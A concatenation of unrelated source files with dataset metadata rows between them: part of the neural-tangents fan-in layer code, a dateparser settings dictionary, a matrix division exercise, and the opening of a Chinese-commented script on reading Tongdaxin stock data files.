'mean-zero Gaussian, i.e. having all '
'`is_gaussian` set to `True`, got '
f'{[k.is_gaussian for k in ks]}.')
_mats_sum = lambda mats: None if mats[0] is None else sum(mats)
cov1s = [k.cov1 for k in ks]
cov2s = [k.cov2 for k in ks]
nngps = [k.nngp for k in ks]
ntks = [k.ntk for k in ks]
cov1, cov2, nngp, ntk = map(_mats_sum, (cov1s, cov2s, nngps, ntks))
return Kernel(
cov1=cov1,
cov2=cov2,
nngp=nngp,
ntk=ntk,
x1_is_x2=ks[0].x1_is_x2,
is_gaussian=is_gaussian,
is_reversed=is_reversed,
is_input=ks[0].is_input,
diagonal_batch=ks[0].diagonal_batch,
diagonal_spatial=ks[0].diagonal_spatial,
shape1=ks[0].shape1,
shape2=ks[0].shape2,
batch_axis=ks[0].batch_axis,
channel_axis=ks[0].channel_axis,
mask1=None,
mask2=None,
) # pytype:disable=wrong-keyword-args
def mask_fn(mask, input_shape):
return _sum_masks(mask)
return init_fn, apply_fn, kernel_fn, mask_fn
@layer
@supports_masking(remask_kernel=False)
def FanInProd() -> InternalLayerMasked:
"""Fan-in product.
This layer takes a number of inputs (e.g. produced by
:obj:`~neural_tangents.stax.FanOut`) and elementwise-multiplies the inputs to
produce a single output.
Returns:
`(init_fn, apply_fn, kernel_fn)`.
"""
init_fn, _ = ostax.FanInSum
def apply_fn(params, inputs, **kwargs):
return functools.reduce(jnp.multiply, inputs)
def kernel_fn(ks: Kernels, **kwargs) -> Kernel:
ks, is_reversed = _preprocess_kernels_for_fan_in(ks)
if not all([k.shape1 == ks[0].shape1 and
k.shape2 == ks[0].shape2 for k in ks[1:]]):
raise ValueError('All shapes should be equal in `FanInProd`.')
is_gaussian = len(ks) == 1 and ks[0].is_gaussian
def _mats_prod(nngps, ntks):
if None in ntks:
return functools.reduce(jnp.multiply, nngps), None
nngp_prod, ntk_prod = 1., 0.
for nngp, ntk in zip(nngps, ntks):
ntk_prod = ntk_prod * nngp + nngp_prod * ntk
nngp_prod *= nngp
return nngp_prod, ntk_prod
cov1s = [k.cov1 for k in ks]
cov2s = [k.cov2 for k in ks]
nngps = [k.nngp for k in ks]
ntks = [k.ntk for k in ks]
cov1 = functools.reduce(jnp.multiply, cov1s)
cov2 = None if None in cov2s else functools.reduce(jnp.multiply, cov2s)
nngp, ntk = _mats_prod(nngps, ntks)
return Kernel(
cov1=cov1,
cov2=cov2,
nngp=nngp,
ntk=ntk,
x1_is_x2=ks[0].x1_is_x2,
is_gaussian=is_gaussian,
is_reversed=is_reversed,
is_input=ks[0].is_input,
diagonal_batch=ks[0].diagonal_batch,
diagonal_spatial=ks[0].diagonal_spatial,
shape1=None,
shape2=None,
batch_axis=ks[0].batch_axis,
channel_axis=ks[0].channel_axis,
mask1=None,
mask2=None,
) # pytype:disable=wrong-keyword-args
def mask_fn(mask, input_shape):
return _sum_masks(mask)
return init_fn, apply_fn, kernel_fn, mask_fn
@layer
@supports_masking(remask_kernel=False)
def FanInConcat(axis: int = -1) -> InternalLayerMasked:
"""Fan-in concatenation.
This layer takes a number of inputs (e.g. produced by
:obj:`~neural_tangents.stax.FanOut`) and concatenates the inputs to produce a
single output. Based on :obj:`jax.example_libraries.stax.FanInConcat`.
Args:
axis: Specifies the axis along which input tensors should be concatenated.
Returns:
`(init_fn, apply_fn, kernel_fn)`.
"""
init_fn, apply_fn = ostax.FanInConcat(axis)
def kernel_fn(ks: Kernels, **kwargs) -> Kernel:
ks, is_reversed = _preprocess_kernels_for_fan_in(ks)
diagonal_batch = ks[0].diagonal_batch
diagonal_spatial = ks[0].diagonal_spatial
shape1, shape2 = ks[0].shape1, ks[0].shape2
ndim = len(shape1)
_axis = axis % ndim
batch_axis = ks[0].batch_axis
channel_axis = ks[0].channel_axis
new_shape1 = shape1[:_axis] + shape1[_axis + 1:]
new_shape2 = shape2[:_axis] + shape2[_axis + 1:]
for k in ks:
k_shape1 = k.shape1[:_axis] + k.shape1[_axis + 1:]
k_shape2 = k.shape2[:_axis] + k.shape2[_axis + 1:]
if k_shape1 != new_shape1 or k_shape2 != new_shape2:
raise ValueError('Non-`axis` shapes should be equal in `FanInConcat`.')
# Check if inputs are independent Gaussians.
if _axis != channel_axis:
is_gaussian = all(k.is_gaussian for k in ks)
if not is_gaussian:
# TODO(xlc): FanInSum/FanInConcat could allow non-Gaussian inputs, but
# we need to propagate the mean of the random variables as well.
raise NotImplementedError(
'`FanInConcat` layer along the non-channel axis is only implemented'
'for the case if all input layers guaranteed to be mean-zero '
'Gaussian, i.e. having all `is_gaussian` set to `True`.')
else:
# TODO(romann): allow nonlinearity after channelwise concatenation.
# TODO(romann): support concatenating different channelwise masks.
is_gaussian = False
if _axis == batch_axis:
warnings.warn(f'Concatenation along the batch axis ({_axis}) gives '
f'inconsistent covariances when batching - '
f'proceed with caution.')
spatial_axes = tuple(i for i in range(ndim)
if i not in (channel_axis, batch_axis))
# Change spatial axis according to the kernel `is_reversed`.
if _axis in spatial_axes and is_reversed:
_axis = spatial_axes[::-1][spatial_axes.index(_axis)]
# Map activation tensor axis to the covariance tensor axis.
tensor_axis_to_kernel_axis = {
**{
batch_axis: 0,
channel_axis: -1,
},
**{
spatial_axis: idx + 1
for idx, spatial_axis in enumerate(spatial_axes)
}
}
_axis = tensor_axis_to_kernel_axis[_axis]
widths = [k.shape1[channel_axis] for k in ks]
cov1 = _concat_kernels([k.cov1 for k in ks], _axis,
diagonal_batch, diagonal_spatial, widths)
cov2 = _concat_kernels([k.cov2 for k in ks], _axis,
diagonal_batch, diagonal_spatial, widths)
nngp = _concat_kernels([k.nngp for k in ks], _axis,
False, diagonal_spatial, widths)
ntk = _concat_kernels([k.ntk for k in ks], _axis,
False, diagonal_spatial, widths)
return Kernel(cov1=cov1,
cov2=cov2,
nngp=nngp,
ntk=ntk,
x1_is_x2=ks[0].x1_is_x2,
is_gaussian=is_gaussian,
is_reversed=is_reversed,
is_input=ks[0].is_input,
diagonal_batch=diagonal_batch,
diagonal_spatial=diagonal_spatial,
shape1=None,
shape2=None,
batch_axis=batch_axis,
channel_axis=channel_axis,
mask1=None,
mask2=None) # pytype:disable=wrong-keyword-args
def mask_fn(mask, input_shape):
return _concat_masks(mask, input_shape, axis)
return init_fn, apply_fn, kernel_fn, mask_fn
# INTERNAL UTILITIES
def _map_tuples(fn: Callable, tuples: Iterable[tuple]) -> tuple:
return tuple(map(fn, zip(*(t for t in tuples))))
def _sum_masks(masks: list[Optional[jnp.ndarray]]) -> Optional[jnp.ndarray]:
def add_two_masks(mask1, mask2):
if mask1 is None:
return mask2
if mask2 is None:
return mask1
return mask1 & mask2
mask = functools.reduce(add_two_masks, masks, None)
return mask
def _concat_masks(
masks: list[Optional[jnp.ndarray]],
input_shapes: Sequence[Sequence[int]],
axis: int
) -> Optional[jnp.ndarray]:
"""Returns a mask which is a concatenation of `masks`.
Since elements of `masks` can have any shapes broadcastable to respective
elements of `input_shapes`, their concatenation may require broadcasting and
cannot be done with a single `jnp.concatenate` call.
Args:
masks: list of masks to concatenate.
input_shapes: list of input shapes to which the masks are applied.
axis: concatenation axis.
Returns:
A single `jnp.ndarray` mask applicable to the concatenated inputs.
"""
if len(masks) != len(input_shapes):
raise ValueError(f'Number of masks ({len(masks)}) and inputs '
f'({len(input_shapes)}) don\'t match, please file a bug at'
f' https://github.com/google/neural-tangents/issues/new.')
if all(m is None for m in masks):
return None
axis %= len(input_shapes[0])
# Expand the concatenation dimension of each mask.
masks = [m if m is None else jnp.broadcast_to(
m,
(m.shape[:axis] +
tuple(input_shapes[i][axis: axis + 1]) +
m.shape[axis + 1:]))
for i, m in enumerate(masks)]
# Max shape to broadcast all masks to along non-concat dimension.
max_shape = _map_tuples(max, (m.shape for m in masks if m is not None))
# Shape of the mask to replace `None` masks with.
max_shapes = [tuple(map(min, max_shape, i)) for i in input_shapes]
masks = [
(jnp.broadcast_to(
m,
max_shape[:axis] + m.shape[axis: axis + 1] + max_shape[axis + 1:])
if m is not None
else jnp.zeros_like(max_shapes[i], dtype=jnp.bool_)) # pytype: disable=wrong-arg-types # jnp-type
for i, m in enumerate(masks)
]
return jnp.concatenate(masks, axis)
def _preprocess_kernels_for_fan_in(ks: Kernels) -> tuple[list[Kernel], bool]:
# Check diagonal requirements.
if not all(k.diagonal_batch == ks[0].diagonal_batch and
k.diagonal_spatial == ks[0].diagonal_spatial and
k.batch_axis == ks[0].batch_axis and
k.channel_axis == ks[0].channel_axis
for k in ks[1:]):
raise NotImplementedError('`FanIn` layers are only implemented for the '
'case if all input layers output the same layout '
'of covariance matrices, i.e. having all '
'matching `diagonal_batch` and '
'`diagonal_spatial` and other attributes.')
# If kernels have different spatial axes order, transpose some of them.
n_kernels = len(ks)
n_reversed = sum(ker.is_reversed for ker in ks)
ks = list(ks)
if n_reversed > n_kernels / 2:
is_reversed = True
for i in range(n_kernels):
if not ks[i].is_reversed:
ks[i] = ks[i].reverse()
else:
is_reversed = False
for i in range(n_kernels):
if ks[i].is_reversed:
ks[i] = ks[i].reverse()
# Warnings.
warnings.warn('`FanIn` layers assume independent inputs which is not verified'
' in the code. Please make sure to have at least one `Dense` / '
'`Conv` / `GlobalSelfAttention` etc. layer in each branch.')
return ks, is_reversed
def _concat_kernels(
mats: Sequence[Optional[jnp.ndarray]],
axis: int,
diagonal_batch: bool,
diagonal_spatial: bool,
widths: Sequence[int]
) -> Optional[jnp.ndarray]:
"""Compute the covariance of concatenated activations with given covariances.
Args:
mats: Covariance tensors of the same shape.
axis: Specifies the axis along which the covariances (not activations) are
concatenated. `-1` corresponds to averaging.
diagonal_batch: Specifies whether `cov1` and `cov2` store only
the diagonal of the sample-sample covariance
(`diagonal_batch == True`,
`cov1.shape == (batch_size_1, ...)`),
or the full covariance
(`diagonal_batch == False`,
`cov1.shape == (batch_size_1, batch_size_1, ...)`).
diagonal_spatial: Specifies whether only the diagonals of the
location-location covariances will be computed,
(`diagonal_spatial == True`,
`nngp.shape == (batch_size_1, batch_size_2, height, width, depth, ...)`),
or the full covariance
(`diagonal_spatial == False`,
`nngp.shape == (batch_size_1, batch_size_2, height, height,
width, width, depth, depth, ...)`).
widths: list of integer channel widths of the finite model inputs.
Returns:
New `jnp.ndarray` representing covariance between concatenated activations.
"""
if mats[0] is None:
return None
n_mats = len(mats)
mat_ndim = mats[0].ndim
# Averaging if concatenating along features or diagonalized dimension.
if axis == -1:
if all(w == widths[0] for w in widths):
widths = [1] * len(widths)
mat = sum(mats[i] * widths[i] for i in range(n_mats)) / sum(widths)
# Simple concatenation along the axis if the axis is not duplicated.
elif ((axis == 0 and diagonal_batch) or
(axis != 0 and diagonal_spatial)):
concat_axis = axis + (0 if diagonal_batch else 1)
mat = jnp.concatenate(mats, concat_axis)
# 2D concatenation with insertion of 0-blocks if the axis is present twice.
else:
rows = []
pad_axis = max(0, 2 * axis - (1 if diagonal_batch else 0))
for i, mat in enumerate(mats):
pads = [(0, 0)] * mat_ndim
pads[pad_axis] = (
sum(mats[j].shape[pad_axis] for j in range(i)),
sum(mats[j].shape[pad_axis] for j in range(i + 1, n_mats))
)
rows.append(jnp.pad(mat, pads))
mat = jnp.concatenate(rows, pad_axis + 1)
return mat
| google/neural-tangents | neural_tangents/_src/stax/branching.py | branching.py | py | 15,516 | python | en | code | 2,138 | github-code | 90 |
10960259417 | settings = {
'PREFER_DATES_FROM': 'current_period',
'SUPPORT_BEFORE_COMMON_ERA': False,
'PREFER_DAY_OF_MONTH': 'current',
'SKIP_TOKENS': ["t"],
'SKIP_TOKENS_PARSER': ["t", "year", "hour", "minute"],
'TIMEZONE': 'local',
'TO_TIMEZONE': False,
'RETURN_AS_TIMEZONE_AWARE': 'default',
'NORMALIZE': True,
'RELATIVE_BASE': False,
'DATE_ORDER': 'MDY',
'PREFER_LOCALE_DATE_ORDER': True,
'FUZZY': False,
'STRICT_PARSING': False
}
| Raghav-Pal/PythonAutomationFramework_1 | venv/Lib/site-packages/dateparser_data/settings.py | settings.py | py | 477 | python | gu | code | 12 | github-code | 90 |
15900215915 | #!/usr/bin/python3
"""Module for matrix divided method"""
def matrix_divided(matrix, div):
"""divides all elements of a matrix by div"""
if (type(div) is not int and type(div) is not float):
raise TypeError("div must be a number")
if (div == 0):
raise ZeroDivisionError("division by zero")
if type(matrix) is not list or len(matrix) == 0:
raise TypeError(
"matrix must be a matrix "
"(list of lists) of integers/floats"
)
new_matrix = []
row_len = None
for row in matrix:
if type(row) is not list or len(matrix[0]) == 0:
raise TypeError(
"matrix must be a matrix "
"(list of lists) of integers/floats"
)
if row_len is None:
row_len = len(row)
if row_len is not len(row):
raise TypeError("Each row of the matrix must have the same size")
new_row = []
for x in row:
if type(x) is not int and type(x) is not float:
raise TypeError(
"matrix must be a matrix "
"(list of lists) of integers/floats"
)
new_row.append(round(x / div, 2))
new_matrix.append(new_row)
return new_matrix
| nerraou/alx-higher_level_programming | 0x07-python-test_driven_development/2-matrix_divided.py | 2-matrix_divided.py | py | 1,291 | python | en | code | 0 | github-code | 90 |
5002452950 | class Stat():
def __init__(self, setg):
self.setg = setg
self.active_game = False
with open('highscore.txt') as file:
self.high_score = int(file.read()) if file else 0
self.reset_stats()
def reset_stats(self):
self.ships_left = self.setg.ships_limit
self.score = 0
self.level = 1
| prgup/space_invader | statics.py | statics.py | py | 300 | python | en | code | 1 | github-code | 90 |
11206125484 | from sys import exit
from decouple import config
from config import config_dict
from app import create_app, celery
DEBUG = config('DEBUG', default=True, cast=bool)
# The configuration
get_config_mode = 'Debug' if DEBUG else 'Production'
try:
# Load the configuration using the default values
app_config = config_dict[get_config_mode.capitalize()]
except KeyError:
exit('Error: Invalid <config_mode>. Expected values [Debug, Production] ')
celery = celery
app = create_app(app_config)
app.app_context().push()
if __name__ == "__main__":
app.run()
| diegozarur/webscanner | run.py | run.py | py | 569 | python | en | code | 1 | github-code | 90 |
18651208898 | from show_data import *
import numpy as np
def metric_comparison(st):
df = pd.read_csv(get_route("all"))
df = df[df['T5_query_rewriter'] == "base"]
df = df[df['run_type'] == "automatic"]
df = df.drop(['Id', 'Creation Time', 'T5_query_rewriter', 'run_type'], axis=1)
metrics_dict = {
'average_ndcg': get_average_ndcg_per_turn(df),
'average_bleu': get_average_bleu_per_turn(df),
'average_rouge': get_average_rouge_per_turn(df)
}
st.subheader("Graph showing the comparison between different metrics at different turns")
st.write("The correlation between rouge and bleu is :" +
str(np.corrcoef(metrics_dict['average_bleu'], metrics_dict['average_rouge'])[0, 1]))
st.write("The correlation between bleu and ndcg is :" +
str(np.corrcoef(metrics_dict['average_bleu'], metrics_dict['average_ndcg'])[0, 1]))
st.write("The correlation between rouge and ndcg is :" +
str(np.corrcoef(metrics_dict['average_rouge'], metrics_dict['average_ndcg'])[0, 1]))
x = [i for i in range(1, 13)]
fig = go.Figure()
fig.add_trace(go.Scatter(x=x, y=metrics_dict['average_ndcg'], mode='lines', name="average_ndcg_per_turn"))
fig.add_trace(go.Scatter(x=x, y=metrics_dict['average_bleu'], mode='lines', name="average_bleu_per_turn"))
fig.add_trace(go.Scatter(x=x, y=metrics_dict['average_rouge'], mode='lines', name="average_rouge_per_turn"))
fig.update_layout(legend=dict(orientation="h", yanchor="bottom", y=1.02, xanchor="right", x=1), width=1000, height=600)
st.plotly_chart(fig, use_container_width=False, sharing="streamlit") | jkoprcina/QueryRewritingDataVisualisation | graphs/metric_comparison.py | metric_comparison.py | py | 1,638 | python | en | code | 0 | github-code | 90 |
7983916988 | import pytest
import math
import time
class Solution(object):
def valid_palindrome_SS(self, str):
str_ans = ""
for i in str:
if i.isalnum():
str_ans += i.lower()
if len(str_ans) == 0:
return True
else:
if len(str_ans)%2 == 0:
for i in range(math.floor(len(str_ans)/2)):
if str_ans[i] != str_ans[len(str_ans)-i-1]:
return False
return True
def valid_palindrome_neat(self, s):
l, r = 0, len(s) - 1
while l < r:
while l < r and not self.alphanum(s[l]):
l += 1
while l < r and not self.alphanum(s[r]):
r -= 1
if s[l].lower() != s[r].lower():
return False
l += 1
r -= 1
return True
# Could write own alpha-numeric function
def alphanum(self, c):
return (
ord("A") <= ord(c) <= ord("Z")
or ord("a") <= ord(c) <= ord("z")
or ord("0") <= ord(c) <= ord("9")
)
# Guide for solution:
# Solution 1: reverse string in python str[::-1] extra memory, O(3n)
# Solution 2: constant memory using pointer : left pointer and right pointer. time complexity O(n)
### Golden rule: | SahandSomi/algorithms-exercise | Two Pointers/Valid Palindrome/valid_palindrome.py | valid_palindrome.py | py | 1,360 | python | en | code | 0 | github-code | 90 |
70993434536 | # Clash Royale Clan Manager
# computes promotion/demotion/kick/warning lists, average war rank, and weekly war champ according to clan wars II statistics
# uses data from Supercell's Clash Royale API
import json
import requests
import statistics
def data_fetcher(clan_tag, token, category):
# fetches data from API for a given category
# categories: currentriverrace, riverracelog, warlog, members, members?limit=50, empty input for clan info etc
myheaders = {}
myheaders['Accept'] = 'application/json'
myheaders['authorization'] = 'Bearer '+token
clan_tag_for_url = '%23' + clan_tag[1:] # replace # with %23 for the http get request
url = "https://api.clashroyale.com/v1/clans/" + clan_tag_for_url + '/' + category
response = requests.request("GET", url, headers=myheaders)
return response.json()
def ClashRoyaleClanManager(clan_tag, token, data_fetched):
# computes promotion/demotion/kick/warning lists, average war rank, and weekly war champ
# fetch and log data
if data_fetched:
with open('logs/members.json', 'r') as outfile:
members = json.load(outfile)
with open('logs/riverracelog.json', 'r') as outfile:
riverracelog = json.load(outfile)
else:
print('Fetching members data...')
members = data_fetcher(clan_tag, token, 'members')
with open('logs/members.json', 'w') as outfile:
json.dump(members, outfile)
print('Fetching riverracelog data...')
riverracelog = data_fetcher(clan_tag, token, 'riverracelog')
with open('logs/riverracelog.json', 'w') as outfile:
json.dump(riverracelog, outfile)
race_indices = [f"{war_week['seasonId']}:{war_week['sectionIndex']}" for war_week in riverracelog['items']]
last_race = str(max(race_indices))
race_indices.remove(last_race)
second_last_race = str(max(race_indices))
# tags of current members
member_tags = [member['tag'] for member in members['items']]
# init dictionary to store the clan log
clan_log = {}
clan_log['ranks'] = []
# init fame
for member in members['items']:
clan_log[member['tag']] = {'name':member['name'], 'role':member['role'], 'fame':{}}
name_to_tag = {clan_log[key]['name']:key for key in clan_log if key != 'ranks'}
# create clan history
for war_week in riverracelog['items']:
# each war week is marked uniqely with "seasonId:sectionIndex"
week_id = f"{war_week['seasonId']}:{war_week['sectionIndex']}"
# locate clan entry
for entry in war_week['standings']:
if entry['clan']['tag'] == clan_tag:
clan_data = entry
# add week data to clan_log
for member in clan_data['clan']['participants']:
if member['tag'] in member_tags:
clan_log[member['tag']]['fame'][week_id] = member['fame']
clan_log['ranks'].append(clan_data['rank'])
print(f"Average war rank: {statistics.mean(clan_log['ranks'])}")
# compute week champ
week_fame = [(clan_log[key]['name'], clan_log[key]['fame'][last_race]) for key in clan_log if key != 'ranks' and last_race in clan_log[key]['fame']]
week_fame.sort(key = lambda x: x[1])
week_champ = week_fame.pop()
# check for multiple champs
max_score = week_champ[1]
if week_fame[-1][1] == max_score:
week_champ = [week_champ, week_fame.pop()]
while week_fame[-1][1] == max_score:
week_champ.append(week_fame.pop())
# status update lists
last_two_weeks_fame = [(clan_log[key]['name'], clan_log[key]['role'], clan_log[key]['fame'][last_race], clan_log[key]['fame'][second_last_race]) for key in clan_log if key != 'ranks' and last_race in clan_log[key]['fame'] and second_last_race in clan_log[key]['fame']]
kick_list = []
demotion_list = []
promotion_list = []
warning_list = []
for item in last_two_weeks_fame:
role = item[1]
last_week_fame = item[2]
second_last_week_fame = item[3]
# promotion rule: two consecutive weeks of at least 1600 fame in war
if last_week_fame > 1600 and second_last_week_fame > 1600 and role == 'member':
promotion_list.append(item)
# warning rule: less than losing all attacks in 3/4 days in the last war
if last_week_fame < 1200:
warning_list.append(item)
# demotion rule (elders): less than 1600 for two consecutive weeks
if last_week_fame < 1600 and second_last_week_fame < 1600 and role == 'elder':
demotion_list.append(item)
# kick rule: total score for two consecutive weeks is less than 2800
# thresshold can be achieved by losing all attacks in 3/4 (1200) and 4/4 (1600) days
if last_week_fame + second_last_week_fame < 3200 and role == 'member':
kick_list.append(item)
print('\nfull war history of members in kick list:')
for item in kick_list:
name = item[0]
print(f"{name}: {clan_log[name_to_tag[name]]['fame']}")
print("\n")
with open("logs/clan-log.json", "w") as outfile:
json.dump(clan_log, outfile)
return week_champ, promotion_list, demotion_list, kick_list, warning_list
## customizations: edit only this part of the code to adapt it to your clan
clan_tag = input("insert clan tag (starting with #): ")
# key created via supercell's CR api
token = input("insert token from Supercell's Clash Royale API: ")
# set to True to compute the output from the local files
data_fetched = False
week_champ, promotion_list, demotion_list, kick_list, warning_list = ClashRoyaleClanManager(clan_tag, token, data_fetched)
print(f"Week champ: {week_champ} \nPromote: {promotion_list} \nDemote: {demotion_list} \nKick: {kick_list} \nwarning list: {warning_list}") | iosifsalem/ClashRoyaleClanManager | ClashRoyaleClanManager.py | ClashRoyaleClanManager.py | py | 6,017 | python | en | code | 1 | github-code | 90 |
42384301415 | import os
from werkzeug.utils import secure_filename
from BismarkPusher import BismarkPusher
from FlaskHelpers import FlaskHelpers
from flask import Flask, url_for, render_template
from flask import request
from flask_cors import CORS
from report_processor.bismarck_report import BismarckReport
from models.Results import Results
from rosetta.rosetta_config import RosettaConfig
import rollbar
import rollbar.contrib.flask
from flask import got_request_exception
import yaml
app = Flask(__name__, static_url_path='/dist')
cors = CORS(app, resources={r"/*": {"origins": "*"}})
flask_helpers = FlaskHelpers()
@app.before_first_request
def init_rollbar():
print('a')
stream = open(os.getcwd() + "/rollbar.yml")
rollbar_settings = yaml.load(stream)
print(rollbar_settings)
"""init rollbar module"""
rollbar.init(
# access token for the demo app: https://rollbar.com/demo
rollbar_settings['key'],
# environment name
rollbar_settings['env'],
# server root directory, makes tracebacks prettier
root=os.path.dirname(os.path.realpath(__file__)),
# flask already sets up logging
allow_logging_basic_config=False)
# send exceptions from `app` to rollbar, using flask's signal system.
got_request_exception.connect(rollbar.contrib.flask.report_exception, app)
@app.route("/")
def index():
return flask_helpers.message('woops... It seems that you got the wrong place', 404)
@app.route("/upload", methods=['POST'])
def upload():
for file in dict(request.files):
current_file = request.files[file]
# Todo: handle when a file already exists.
path = os.getcwd() + '/uploads/' + secure_filename(current_file.filename)
current_file.save(path)
return flask_helpers.response(response={'file': path})
@app.route("/process_files", methods=['POST'])
def process():
parsed_request = dict(request.form)
# A couple of validations.
if 'files' not in parsed_request.keys():
return flask_helpers.error('The files property is empty.')
if 'room' not in parsed_request.keys():
return flask_helpers.error('You need to provide the pusher room.')
if parsed_request['files'] is None:
return flask_helpers.error('The files object is empty.')
# Init variables.
pusher = BismarkPusher(parsed_request['room'])
reports = {}
for file in parsed_request['files'][0].split(","):
if file == '':
continue
# Get the file name.
file_split = file.split('/')
file_name = file_split[-1]
# Notify the user we started to process.
pusher.send_message(event='processing_file', message=file_name)
# Check out the new api to bismark report
b_report = BismarckReport(report_file_name=file)
b_report.process_book()
reports[file_name] = b_report.get_compact()
# Saving the results inside the DB.
results = Results()
document = results.insert({'results': reports})
# Done!
# pusher.send_message(event='done', message=document)
return flask_helpers.response(response={'data': document})
@app.route("/process_files/<id>", methods=['GET'])
def process_files_results(id):
"""
Return the results for process files.
:param id:
The ID of the process.
:return:
The object in the DB.
"""
results = Results()
return flask_helpers.response(results.load(id))
@app.route("/metadata", methods=['GET'])
def metadata():
rosetta = RosettaConfig()
return flask_helpers.response({
'fields': flask_helpers.flip_dict(rosetta.FIELDS_LIST),
'instruments': flask_helpers.flip_dict(rosetta.INSTRUMENT_DICT)
})
| RoySegall/BismarckValidator | app.py | app.py | py | 3,743 | python | en | code | 1 | github-code | 90 |
11623078255 | ############################################################
# #
# Author: Adrian T. Neumann #
# Date: 11 November 2018 #
# Description: A program that accepts the number #
# of hours worked on each of five work days from the #
# user, then displays different information calculated #
# about those entries as output. #
# #
############################################################
# Compute number of days at work
def NonZeroHours(in_hours):
DaysWorked = 0
for hours in in_hours:
if hours != 0:
DaysWorked = DaysWorked + 1
return DaysWorked
def CalulateTotalHours(in_hours):
Time = 0
# Sum the hours
for days in range(5):
Time += in_hours[days]
return Time
# Calculate the number of hours on any given day
def CalculateMaxHours(in_hours):
# Sort the HoursWorked list
SortedHoursWorked = sorted(in_hours)
# Select the greatest value
MaxHours = SortedHoursWorked[-1]
return MaxHours
# Validate the daily hours worked
def CollectHoursWorked(in_message):
NumberString = ""
# Main validation loop
while NumberString.isdigit() == False:
NumberString = input(in_message)
Number = int(NumberString)
# Checks to make sure that only increments of 24 hours values are entered
if Number < 0 or Number > 24:
# Break out of main validation loop
NumberString = "Incorrect hours"
else:
return Number
def main():
# Main program loop flag
DoYouWantToContinue = "Y"
NumberOfDays = 5
while DoYouWantToContinue == "Y":
# Variables and Input
HoursWorked = []
SortedHoursWorked = []
MaximumHoursWorked = 0
DaysMaximumHoursWorked = 0
DayOne = ""
DayTwo = ""
DayThree = ""
DayFour = ""
DayFive = ""
# Collect hours worked on each of five workdays
HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #1: " ))
HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #2: " ))
HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #3: " ))
HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #4: " ))
HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #5: " ))
# Processing
# Calculate maximum hours, total hours, days actually worked, and average hours
MaximumHoursWorked = CalculateMaxHours(HoursWorked)
TotalHours = CalulateTotalHours(HoursWorked)
#DaysWorked = NonZeroHours(HoursWorked)
AverageHours = TotalHours / NumberOfDays
Day = []
# Calculate the days when the maximum hours were worked
for days in range(NumberOfDays):
if HoursWorked[days] == MaximumHoursWorked:
Day.append(days + 1)
else:
Day.append("")
# Assign maximum workload days to individual variable for ouput formatting
DayOne,DayTwo,DayThree,DayFour,DayFive = Day
SlackDay = []
# Calculate slackdays
for days in range(NumberOfDays):
if HoursWorked[days] < 7:
SlackDay.append(days + 1)
# Output
print("--------------------------------------------------------------------------")
print("The most hours worked was on: ")
print("Day(s)# {0} {1} {2} {3} {4} when you worked {5} hours.".format(DayOne,DayTwo,DayThree,DayFour,DayFive,MaximumHoursWorked))
print("--------------------------------------------------------------------------")
print("The total number of hours worked was: {0} ".format(TotalHours))
print("The average number of hours worked on each day was: {0} ".format(AverageHours))
print("------------------------------------------------------------------------- ")
print("Days you slacked off (i.e. worked less than 7 hours):")
# Print slack days
for days in SlackDay:
print('Day #',days,':',HoursWorked[days-1],'hours')
DoYouWantToContinue = input("Enter 'y' to continue: ").upper()
if __name__ == "__main__":
main()
| Bach9000/prog1015_an | Assignments/Assignemnt 3/Program 1- Time Sheet.py | Program 1- Time Sheet.py | py | 4,597 | python | en | code | 0 | github-code | 90 |
17980484222 |
from functools import wraps
from flask import make_response, abort
from app.models.customer import Customer
from app.models.video import Video
def validate_endpoint(endpoint):
"""Decorator to validate that endpoint id is an int. Returns JSON and
400 if not found.
"""
@wraps(endpoint) # Makes fn look like func to return
def fn(*args, **kwargs):
"""Validates id for endpoint is an integer."""
if "customer_id" in kwargs:
customer_id = kwargs.get("customer_id", None)
try:
int(customer_id)
except:
abort(make_response({f"details": f"{customer_id} must be an int."}, 400))
customer = Customer.query.get(customer_id)
if not customer:
abort(make_response({"message" :f"Customer {customer_id} was not found"}, 404))
kwargs.pop("customer_id")
return endpoint(*args, customer=customer, **kwargs)
elif "video_id" in kwargs:
video_id = kwargs.get("video_id", None)
try:
int(video_id)
except:
abort(make_response({f"details": f"{video_id} must be an int."}, 400))
video = Video.query.get(video_id)
if not video:
abort(make_response({"message" :f"Video {video_id} was not found"}, 404))
kwargs.pop("video_id")
return endpoint(*args, video=video, **kwargs)
return fn | lgaetano/retro-video-store | app/utils/endpoint_validation.py | endpoint_validation.py | py | 1,499 | python | en | code | 0 | github-code | 90 |
18052667839 | # -*- coding: utf-8 -*-
import sys
sys.setrecursionlimit(10**9)
INF=10**18
MOD=10**9+7
input=lambda: sys.stdin.readline().rstrip()
YesNo=lambda b: bool([print('Yes')] if b else print('No'))
YESNO=lambda b: bool([print('YES')] if b else print('NO'))
int1=lambda x:int(x)-1
def main():
N=int(input())
T,A=map(int,input().split())
for _ in range(N-1):
t,a=map(int,input().split())
res=max(-(-T//t),-(-A//a))
T,A=t*res,a*res
print(T+A)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03964/s796893815.py | s796893815.py | py | 512 | python | en | code | 0 | github-code | 90 |
31228021372 | # -*- coding: utf-8 -*-
"""
本程序用通达信数据对股价前复权,将数据保存为excel文件
通达信本地数据格式:
每32个字节为一个5分钟数据,每字段内低字节在前
00 ~ 01 字节:日期,整型,设其值为num,则日期计算方法为:
year=floor(num/2048)+2004;
month=floor(mod(num,2048)/100);
day=mod(mod(num,2048),100);
02 ~ 03 字节: 从0点开始至目前的分钟数,整型
04 ~ 07 字节:开盘价*100,整型
08 ~ 11 字节:最高价*100,整型
12 ~ 15 字节:最低价*100,整型
16 ~ 19 字节:收盘价*100,整型
20 ~ 23 字节:成交额*100,float型
24 ~ 27 字节:成交量(股),整型
28 ~ 31 字节:(保留)
每32个字节为一天数据
每4个字节为一个字段,每个字段内低字节在前
00 ~ 03 字节:年月日, 整型
04 ~ 07 字节:开盘价*100, 整型
08 ~ 11 字节:最高价*100, 整型
12 ~ 15 字节:最低价*100, 整型
16 ~ 19 字节:收盘价*100, 整型
20 ~ 23 字节:成交额(元),float型
24 ~ 27 字节:成交量(股),整型
28 ~ 31 字节:(保留)
读取需要加载struct模块,unpack之后得到一个元组。
日线读取:
fn=r"code.day";
fid=open(fn,"rb");
list=fid.read(32)
ulist=struct.unpack("iiiiifii", list)
